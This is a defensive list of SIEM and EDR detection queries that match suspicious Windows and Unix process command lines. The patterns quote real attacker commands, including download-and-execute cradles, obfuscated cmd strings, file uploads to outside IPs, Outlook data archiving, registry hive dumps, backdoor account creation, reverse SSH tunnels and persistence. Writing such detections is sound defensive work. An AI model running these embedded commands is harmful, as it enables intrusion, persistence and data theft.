Detection Query 1 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%powershell.exe -File %APPDATA%\Local\Microsoft\InputPersonalization\TrainedDataStore.ps1%" |
Detection Query 2 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell -w 1 " and commandline like "%$Pbwpc=(Get-Content -Path '%LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt'); &(gcm%" and commandline like "i*x)$Pbwpc" |
Detection Query 3 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%copy-item C:/Users/%/AppData/Local/Microsoft/Outlook/% $env:APPDATA/%.ost%" |
Detection Query 4 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%rundll32.exe %WINDIR%\system32\davclnt.dll, DavSetCookie datadrift.somee.com@SSL https://datadrift.somee.com/aoh5/[REDACTED].lnk%" |
Detection Query 5 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell -w 1 " and commandline like "%$PbwpcDxXtAnaGrsu=(Get-Content -Path %LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt); &(gcm i*x)$PbwpcDxXtAnaGrsu%" |
Detection Query 6 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "start msedge" and commandline like "https://1drv.ms/w/c/208F0gfdtrhkjB256/EXaIieylg5EtG6mcLAdhtdhgdytrfHM31tA?e=pjdsyyI\" |
Detection Query 7 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d" and commandline like "%id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf%" and commandline like "-X PO7ST https://prism-west-candy.glitch.me/Down" and commandline like "-o %temp%\\down.v7bs & call %c:7=% & set b=sta7rt%" and commandline like "%temp%\\down.v7bs\ & call %b:7=%" |
Detection Query 8 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%conhost --headless %PUBLIC%\Microsoft.bat%" |
Detection Query 9 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%LOCALAPPDATA%\Caches\pssuspend.exe -accepteula -nobanner <%>%" |
Detection Query 10 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "curl.exe -X POST" and commandline like "https://<FIREBASE-ENDPOINT>.json" and commandline like "-H" and commandline like "Content-Type: application/json" and commandline like "-d%" and commandline like "--ssl-no-revoke" |
Detection Query 11 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell -w 1" and commandline like "%$pnt=(Get-Content -Path %APPDATA%\Microsoft\documentLoger.txt);&(gcm%" and commandline like "i*x)$pnt" |
Detection Query 12 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%cmd /c curl --ssl-no-revoke -o vgh.txt https://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%" |
Detection Query 13 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\cmd.exe%" and commandline like "/c set hm=" and commandline like "%cmolbd /c colburl --ssolblno-revoolbke -o vgh.tolbxt https://linolbe.complolbetely.workolbers.deolbv/aoh5 & rename vgh.tolbxt temolbp.baolbt & %tmolbp%" and commandline like "& call %hm:olb=%" |
Detection Query 14 : | resourcename = "Windows Security" and eventtype = "4688" and commandline like "msedge.exe --no-sandbox --remote-debugging-port=9222 --remote-allow-origins=ws://localhost:9222 --window-position=-32000,-32000" |
Detection Query 15: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell -w 1 " and commandline like "$lb=" and commandline like "gBjs" and commandline like ";$uq=(invoke-restmethod -UserAgent Chrome https://line.completely.workers.dev/aoh52) c;.(gcm i*ee*)$uq" |
Detection Query 16: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "curl --http2 --header " and commandline like "accept: application/dns-json" and commandline like "https://1.1.1.1/dns-query?name=google.com" |
Detection Query 17: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe" and commandline like "New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name VLC -Value %ALLUSERSPROFILE%\PolGuid\VLC\vlc.exe -PropertyType String;New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name WingetUI -Value %ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe -PropertyType String;%" |
Detection Query 18: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "chcp 65001 TaskKill /F /IM 8020 Timeout /T 2 /Nobreak Del /ah" |
Detection Query 19: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "chcp 65001 TaskKill /F /IM 5268 Timeout /T 2 /Nobreak Del /ah" |
Detection Query 20: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe%" and commandline like "%-exec bypass -w -l -file %ALLUSERSPROFILE%\a.ps1%" |
Detection Query 21: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe%" and commandline like "%/noconfig %" and commandline like "%WINDIR%\TEMP\dlr5lzwp\dlr5lzwp.cmdline%" |
Detection Query 22: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "save HKLM\SYSTEM SystemBkup.hiv" |
Detection Query 23: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "save HKLM\SYSTEM SystemBkup.hiv" |
Detection Query 24: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "netbird.exe setup --setup-key E48E4A70-4CF4-4A77-946B-C8E50A60855A --management-url" |
Detection Query 25: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "schtasks /create /tn ForceNetbirdRestart" |
Detection Query 26: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "net localgroup Administrators user /add" |
Detection Query 27: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "sc config sshd start= auto" |
Detection Query 28: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "sc config netbird start= delayed-auto" |
Detection Query 29: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%wmic useraccount where name='%' set passwordexpires=false%" |
Detection Query 30: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "net localgroup Administrateurs user /add" |
Detection Query 31: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell.exe -WindowStyle Hidden" |
Detection Query 32: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "net user user Bs@202122 /add" |
Detection Query 33: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell.exe -Command " and commandline like "%Copy-Item -Path % -Destination %ALLUSERSPROFILE%\Logs -Force%" |
Detection Query 34: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe%" and commandline like "(Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149.51/57576?filter_relational_operator_2=60169).content" and commandline like "Invoke-Expression" |
Detection Query 35: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%schtasks /create /sc daily /st % /tn %" and commandline like "DailyUpdate" and commandline like "/tr " and commandline like "%PUBLIC%\Downloads\novaservice.exe%" |
Detection Query 36: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand [REDACTED]" |
Detection Query 37: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "$wc = New-Object System.Net.WebClient;" and commandline like "$wc.UploadFile http://143.198.5.41:443/success" and commandline like "%PUBLIC%\downloads\cobe-notes.txt;%" |
Detection Query 38: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "taskkill /IM novaservice.exe" |
Detection Query 39: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%Start-Process %ALLUSERSPROFILE%\FMAPP.exe -WindowStyle Hidden%" |
Detection Query 40: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%PROGRAMFILES%\Microsoft Office\Office16\WINWORD.EXE%" |
Detection Query 41: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\cmd.exe%" and commandline like "%/c %ALLUSERSPROFILE%\CertificationKit.ini%" |
Detection Query 42: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%TNC <%> -Port 135%" |
Detection Query 43: | resourcename = "Windows Security" and eventtype = "4688" and commandline like ".\SOCKSSrv.exe" |
Detection Query 44: | resourcename = "Windows Security" and eventtype = "4688" and (commandline like "netstat -nao" or commandline like "findstr 28443") |
Detection Query 45: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%Enter-PSSession -ComputerName <%>%" |
Detection Query 46: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%TNC <%> -Port 389%" |
Detection Query 47: | resourcename = "Windows Security" and eventtype = "4688" and (commandline like "netstat -nao" or commandline like "findstr 443") |
Detection Query 48: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "netsh i p re all" |
Detection Query 49: | resourcename = "Windows Security" and eventtype = "4688" and commandline like ".\443.exe" |
Detection Query 50: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\drivers\conhost.exe -f conhost.dll -ER --ln --path cmd.exe%" |
Detection Query 51: | resourcename = "Windows Security" and eventtype = "4688" and (commandline like "cmd.exe /C systeminfo" or commandline like "findstr /I") |
Detection Query 52: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%PROGRAMFILES%\WinRAR\RAR.exe%" and commandline like "a -v1000m -m5" and commandline like "%PROGRAMFILES%\WinRAR\%.rar%" and commandline like "%C:/Users/%/AppData/Local/Microsoft/Outlook/%" |
Detection Query 53: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "net user DC-01$ P@ssw0rd" |
Detection Query 54: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\system32\openssh\ssh.exe[%]@[%] -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070%" |
Detection Query 55: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "reg delete" and commandline like "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" and commandline like "/va /f" |
Detection Query 56: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "reg delete" and commandline like "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" and commandline like "/f" |
Detection Query 57: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "SCCM.exe reconfig /target:[REDACTED]" |
Detection Query 58: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Renovation -Value" and commandline like "cmd /c \" |
Detection Query 59: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "$path=$di+\WinWebex.exe;Add-Type -A System.Net.Http;$c=New-Object System.Net.Http.HttpClient; $c.DefaultRequestHeaders.UserAgent.ParseAdd(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0);[IO.File]::WriteAllBytes($path, $c.GetAsync(https://meetingapp.site/webexdownload).Result.Content.ReadAsByteArrayAsync().Result); $c.Dispose();Register-ScheduledTask -TaskName winWebex -Action (New-ScheduledTaskAction -Execute $path) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 2) -RepetitionDuration ([TimeSpan]::FromDays(9999))) -Settings (New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 0)) -Force; Start-ScheduledTask -TaskName winWebex;exit;" |
Detection Query 60: | technologygroup = "EDR" and commandline like "%powershell.exe -File %APPDATA%\Local\Microsoft\InputPersonalization\TrainedDataStore.ps1%" |
Detection Query 61: | technologygroup = "EDR" and commandline like "powershell -w 1 " and commandline like "%$Pbwpc=(Get-Content -Path '%LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt'); &(gcm%" and commandline like "i*x)$Pbwpc" |
Detection Query 62: | technologygroup = "EDR" and commandline like "%copy-item C:/Users/%/AppData/Local/Microsoft/Outlook/% $env:APPDATA/%.ost%" |
Detection Query 63: | technologygroup = "EDR" and commandline like "%rundll32.exe %WINDIR%\system32\davclnt.dll, DavSetCookie datadrift.somee.com@SSL https://datadrift.somee.com/aoh5/[REDACTED].lnk%" |
Detection Query 64: | technologygroup = "EDR" and commandline like "powershell -w 1 " and commandline like "%$PbwpcDxXtAnaGrsu=(Get-Content -Path %LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt); &(gcm i*x)$PbwpcDxXtAnaGrsu%" |
Detection Query 65: | technologygroup = "EDR" and commandline like "start msedge" and commandline like "https://1drv.ms/w/c/208F0gfdtrhkjB256/EXaIieylg5EtG6mcLAdhtdhgdytrfHM31tA?e=pjdsyyI\" |
Detection Query 66: | technologygroup = "EDR" and commandline like "cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d" and commandline like "%id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf%" and commandline like "-X PO7ST https://prism-west-candy.glitch.me/Down" and commandline like "-o %temp%\\down.v7bs & call %c:7=% & set b=sta7rt%" and commandline like "%temp%\\down.v7bs\ & call %b:7=%" |
Detection Query 67: | technologygroup = "EDR" and commandline like "%conhost --headless %PUBLIC%\Microsoft.bat%" |
Detection Query 68: | technologygroup = "EDR" and commandline like "%LOCALAPPDATA%\Caches\pssuspend.exe -accepteula -nobanner <%>%" |
Detection Query 69: | technologygroup = "EDR" and commandline like "curl.exe -X POST" and commandline like "https://<FIREBASE-ENDPOINT>.json" and commandline like "-H" and commandline like "Content-Type: application/json" and commandline like "-d%" and commandline like "--ssl-no-revoke" |
Detection Query 70: | technologygroup = "EDR" and commandline like "powershell -w 1" and commandline like "%$pnt=(Get-Content -Path %APPDATA%\Microsoft\documentLoger.txt);&(gcm%" and commandline like "i*x)$pnt" |
Detection Query 71: | technologygroup = "EDR" and commandline like "%cmd /c curl --ssl-no-revoke -o vgh.txt https://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%" |
Detection Query 72: | technologygroup = "EDR" and commandline like "%WINDIR%\System32\cmd.exe%" and commandline like "/c set hm=" and commandline like "%cmolbd /c colburl --ssolblno-revoolbke -o vgh.tolbxt https://linolbe.complolbetely.workolbers.deolbv/aoh5 & rename vgh.tolbxt temolbp.baolbt & %tmolbp%" and commandline like "& call %hm:olb=%" |
Detection Query 73: | technologygroup = "EDR" and commandline like "msedge.exe --no-sandbox --remote-debugging-port=9222 --remote-allow-origins=ws://localhost:9222 --window-position=-32000,-32000" |
Detection Query 74: | technologygroup = "EDR" and commandline like "powershell -w 1 " and commandline like "$lb=" and commandline like "gBjs" and commandline like ";$uq=(invoke-restmethod -UserAgent Chrome https://line.completely.workers.dev/aoh52) c;.(gcm i*ee*)$uq" |
Detection Query 75: | technologygroup = "EDR" and commandline like "curl --http2 --header " and commandline like "accept: application/dns-json" and commandline like "https://1.1.1.1/dns-query?name=google.com" |
Detection Query 76: | technologygroup = "EDR" and commandline like "%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe" and commandline like "New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name VLC -Value %ALLUSERSPROFILE%\PolGuid\VLC\vlc.exe -PropertyType String;New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name WingetUI -Value %ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe -PropertyType String;%" |
Detection Query 77: | technologygroup = "EDR" and commandline like "chcp 65001 TaskKill /F /IM 8020 Timeout /T 2 /Nobreak Del /ah" |
Detection Query 78: | technologygroup = "EDR" and commandline like "chcp 65001 TaskKill /F /IM 5268 Timeout /T 2 /Nobreak Del /ah" |
Detection Query 79: | technologygroup = "EDR" and commandline like "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe%" and commandline like "%-exec bypass -w -l -file %ALLUSERSPROFILE%\a.ps1%" |
Detection Query 80: | technologygroup = "EDR" and commandline like "%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe%" and commandline like "%/noconfig %" and commandline like "%WINDIR%\TEMP\dlr5lzwp\dlr5lzwp.cmdline%" |
Detection Query 81: | technologygroup = "EDR" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "save HKLM\SYSTEM SystemBkup.hiv" |
Detection Query 82: | technologygroup = "EDR" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "save HKLM\SYSTEM SystemBkup.hiv" |
Detection Query 83: | technologygroup = "EDR" and commandline like "netbird.exe setup --setup-key E48E4A70-4CF4-4A77-946B-C8E50A60855A --management-url" |
Detection Query 84: | technologygroup = "EDR" and commandline like "schtasks /create /tn ForceNetbirdRestart" |
Detection Query 85: | technologygroup = "EDR" and commandline like "net localgroup Administrators user /add" |
Detection Query 86: | technologygroup = "EDR" and commandline like "sc config sshd start= auto" |
Detection Query 87: | technologygroup = "EDR" and commandline like "sc config netbird start= delayed-auto" |
Detection Query 88: | technologygroup = "EDR" and commandline like "%wmic useraccount where name='%' set passwordexpires=false%" |
Detection Query 89: | technologygroup = "EDR" and commandline like "net localgroup Administrateurs user /add" |
Detection Query 90: | technologygroup = "EDR" and commandline like "powershell.exe -WindowStyle Hidden" |
Detection Query 91: | technologygroup = "EDR" and commandline like "net user user Bs@202122 /add" |
Detection Query 92: | technologygroup = "EDR" and commandline like "powershell.exe -Command " and commandline like "%Copy-Item -Path % -Destination %ALLUSERSPROFILE%\Logs -Force%" |
Detection Query 93: | technologygroup = "EDR" and commandline like "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe%" and commandline like "(Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149.51/57576?filter_relational_operator_2=60169).content" and commandline like "Invoke-Expression" |
Detection Query 94: | technologygroup = "EDR" and commandline like "%schtasks /create /sc daily /st % /tn %" and commandline like "DailyUpdate" and commandline like "/tr " and commandline like "%PUBLIC%\Downloads\novaservice.exe%" |
Detection Query 95: | technologygroup = "EDR" and commandline like "powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand [REDACTED]" |
Detection Query 96: | technologygroup = "EDR" and commandline like "$wc = New-Object System.Net.WebClient;" and commandline like "$wc.UploadFile http://143.198.5.41:443/success" and commandline like "%PUBLIC%\downloads\cobe-notes.txt;%" |
Detection Query 97: | technologygroup = "EDR" and commandline like "taskkill /IM novaservice.exe" |
Detection Query 98: | technologygroup = "EDR" and commandline like "%Start-Process %ALLUSERSPROFILE%\FMAPP.exe -WindowStyle Hidden%" |
Detection Query 99: | technologygroup = "EDR" and commandline like "%PROGRAMFILES%\Microsoft Office\Office16\WINWORD.EXE%" |
Detection Query 100: | technologygroup = "EDR" and commandline like "%WINDIR%\System32\cmd.exe%" and commandline like "%/c %ALLUSERSPROFILE%\CertificationKit.ini%" |
Detection Query 101: | technologygroup = "EDR" and commandline like "%TNC <%> -Port 135%" |
Detection Query 102: | technologygroup = "EDR" and commandline like ".\SOCKSSrv.exe" |
Detection Query 103: | technologygroup = "EDR" and (commandline like "netstat -nao" or commandline like "findstr 28443") |
Detection Query 104: | technologygroup = "EDR" and commandline like "%Enter-PSSession -ComputerName <%>%" |
Detection Query 105: | technologygroup = "EDR" and commandline like "%TNC <%> -Port 389%" |
Detection Query 106: | technologygroup = "EDR" and (commandline like "netstat -nao" or commandline like "findstr 443") |
Detection Query 107: | technologygroup = "EDR" and commandline like "netsh i p re all" |
Detection Query 108: | technologygroup = "EDR" and commandline like ".\443.exe" |
Detection Query 109: | technologygroup = "EDR" and commandline like "%WINDIR%\System32\drivers\conhost.exe -f conhost.dll -ER --ln --path cmd.exe%" |
Detection Query 110: | technologygroup = "EDR" and (commandline like "cmd.exe /C systeminfo" or commandline like "findstr /I") |
Detection Query 111: | technologygroup = "EDR" and commandline like "%PROGRAMFILES%\WinRAR\RAR.exe%" and commandline like "a -v1000m -m5" and commandline like "%PROGRAMFILES%\WinRAR\%.rar%" and commandline like "%C:/Users/%/AppData/Local/Microsoft/Outlook/%" |
Detection Query 112: | technologygroup = "EDR" and commandline like "net user DC-01$ P@ssw0rd" |
Detection Query 113: | technologygroup = "EDR" and commandline like "%WINDIR%\system32\openssh\ssh.exe[%]@[%] -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070%" |
Detection Query 114: | technologygroup = "EDR" and commandline like "reg delete" and commandline like "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" and commandline like "/va /f" |
Detection Query 115: | technologygroup = "EDR" and commandline like "reg delete" and commandline like "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" and commandline like "/f" |
Detection Query 116: | technologygroup = "EDR" and commandline like "SCCM.exe reconfig /target:[REDACTED]" |
Detection Query 117: | technologygroup = "EDR" and commandline like "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Renovation -Value" and commandline like "cmd /c \" |
Detection Query 118: | technologygroup = "EDR" and commandline like "$path=$di+\WinWebex.exe;Add-Type -A System.Net.Http;$c=New-Object System.Net.Http.HttpClient; $c.DefaultRequestHeaders.UserAgent.ParseAdd(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0);[IO.File]::WriteAllBytes($path, $c.GetAsync(https://meetingapp.site/webexdownload).Result.Content.ReadAsByteArrayAsync().Result); $c.Dispose();Register-ScheduledTask -TaskName winWebex -Action (New-ScheduledTaskAction -Execute $path) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 2) -RepetitionDuration ([TimeSpan]::FromDays(9999))) -Settings (New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 0)) -Force; Start-ScheduledTask -TaskName winWebex;exit;" |
Detection Query 119: | resourcename = "Unix" and commandline like "uname -v > /tmp/%" and commandline like ".txt 2>&1" |
Detection Query 120: | resourcename = "Unix" and commandline like "hostname > /tmp/%" and commandline like ".txt 2>&1" |
Detection Query 121: | resourcename = "Unix" and commandline like "whoami > /tmp/%" and commandline like ".txt 2>&1" |
Detection Query 122: | resourcename = "Unix" and commandline like "+%Z > /tmp/%" and commandline like ".txt 2>&1" |
Detection Query 123: | resourcename = "Unix" and commandline like "uname -r > /tmp/%" and commandline like ".txt 2>&1" |
Detection Query 124: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "ssh 104.238.191.185 -P 443" |
Detection Query 125: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "netsh i p a v listenport=443 connecthost=127.0.0.1 connectport=28443" |
Detection Query 126: | resourcename = "Windows Security" and eventtype = "4688" and commandline like "netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443" |
Detection Query 127: | technologygroup = "EDR" and commandline like "uname -v > /tmp/%" and commandline like ".txt 2>&1" |
Detection Query 128: | technologygroup = "EDR" and commandline like "hostname > /tmp/%" and commandline like ".txt 2>&1" |
Detection Query 129: | technologygroup = "EDR" and commandline like "whoami > /tmp/%" and commandline like ".txt 2>&1" |
Detection Query 130: | technologygroup = "EDR" and commandline like "+%Z > /tmp/%" and commandline like ".txt 2>&1" |
Detection Query 131: | technologygroup = "EDR" and commandline like "uname -r > /tmp/%" and commandline like ".txt 2>&1" |
Detection Query 132: | technologygroup = "EDR" and commandline like "ssh 104.238.191.185 -P 443" |
Detection Query 133: | technologygroup = "EDR" and commandline like "netsh i p a v listenport=443 connecthost=127.0.0.1 connectport=28443" |
Detection Query 134: | technologygroup = "EDR" and commandline like "netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443" |